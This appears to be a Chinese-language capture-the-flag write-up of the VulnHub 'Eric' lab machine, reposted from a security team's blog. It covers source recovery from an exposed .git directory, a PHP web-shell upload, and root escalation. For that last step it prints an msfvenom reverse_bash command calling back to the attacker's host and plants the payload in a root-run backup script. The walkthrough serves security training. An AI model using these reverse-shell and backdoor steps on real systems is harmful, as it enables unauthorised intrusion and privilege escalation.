VulnHub靶机学习——Eric

admin 2022年5月8日14:23:43安全文章评论10 views1542字阅读5分8秒阅读模式

山东新潮信息

专业|专注|卓越|安全


VulnHub靶机学习——Eric
VulnHub靶机学习——Eric
VulnHub靶机学习——Eric
VulnHub靶机学习——Eric
VulnHub靶机学习——Eric
VulnHub靶机学习——Eric
VulnHub靶机学习——Eric


声明Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!


一,运行说明

       * 靶机难度:初级

       * 目       标:提权、获取flag

       * 运行环境:攻击机kali linux

                            靶机Eric

                            运行于VM VirtualBox

       * 网络设置:均为Nat模式

       * Flag目录:/root/flag.txt

                           /home/eric/flag.txt

二、过程

          作者已经说明flag的具体位置,但是该有的操作还是要有的~

  1、前期信息搜集

          刚装好的靶机,当然是先要用nmap找到地址~。kali地址是10.0.2.4,靶机地址10.0.2.5

VulnHub靶机学习——Eric

          可以看到开放了22和80端口,先在浏览器中打开看看。

VulnHub靶机学习——Eric

          说是未完成的博客,好吧,再用nmap和dirbuster爆破,同时进行省时省力

VulnHub靶机学习——EricVulnHub靶机学习——Eric           可以看到有admin.php,.git文件,upload目录等许多有用的东西,先看一下admin.php

VulnHub靶机学习——Eric           admin.php是一个登录页,直接爆破的话大概率是不可行的,账户密码应该会藏在别的地方,先继续看看

VulnHub靶机学习——Eric

           源代码里也没啥

           使用Githack扫描目录,GitHack是一个.git泄露利用脚本,下载地址https://github.com/lijiejie/GitHack,下载后直接在python环境中运行即可

VulnHub靶机学习——Eric

           扫描后的结果保存在本地以URL命名的文件夹中,可以看到admin.php及index.php的源码已经被还原,打开看一下

VulnHub靶机学习——Eric           找到了登陆用的账户密码,直接拿来登录去

     2、文件上传、反弹shell

           登录后是一个上传页面,看起来没有限定上传文件的格式

VulnHub靶机学习——Eric           直接上传木马试试

VulnHub靶机学习——Eric           然后在kali监听6666端口,浏览器访问upload目录下的6666.php

VulnHub靶机学习——EricVulnHub靶机学习——Eric           很好,直接就成功了,不算很难嘛。直接su  -

VulnHub靶机学习——Eric

          这个好办,几乎每次都会遇到。python3 -c ‘importpty;pty.spawn(“/bin/bash”)’

VulnHub靶机学习——Eric          作者已经告诉我们flag地址了,先找/home/eric/flag.txt

VulnHub靶机学习——Eric          在这个eric目录下,我们还发现了一个backup.sh文件,这个文件是以root身份运行的,并且具有所有的权限

VulnHub靶机学习——Eric          那么我们可以利用这个backup.sh文件提权到root,可以利用上次用到的msfvenom生成脚本

    3、提权

          kali本地执行msfvenom-p cmd/unix/reverse_bash lhost=10.0.2.4 lport=1234 R

VulnHub靶机学习——Eric          将生成的payload加载到backup.sh中去

VulnHub靶机学习——Eric          然后在本地监听1234端口,靶机中运行脚本

VulnHub靶机学习——Eric

          以root身份进入靶机后即可查看第二个flag.txt

VulnHub靶机学习——Eric

         至此结束,总体来说感觉不是很难~





E




N




D






VulnHub靶机学习——Eric


guān




zhù







men





Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:

VulnHub靶机学习——Eric




原文始发于微信公众号(白帽子):VulnHub靶机学习——Eric

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月8日14:23:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  VulnHub靶机学习——Eric http://cn-sec.com/archives/978626.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: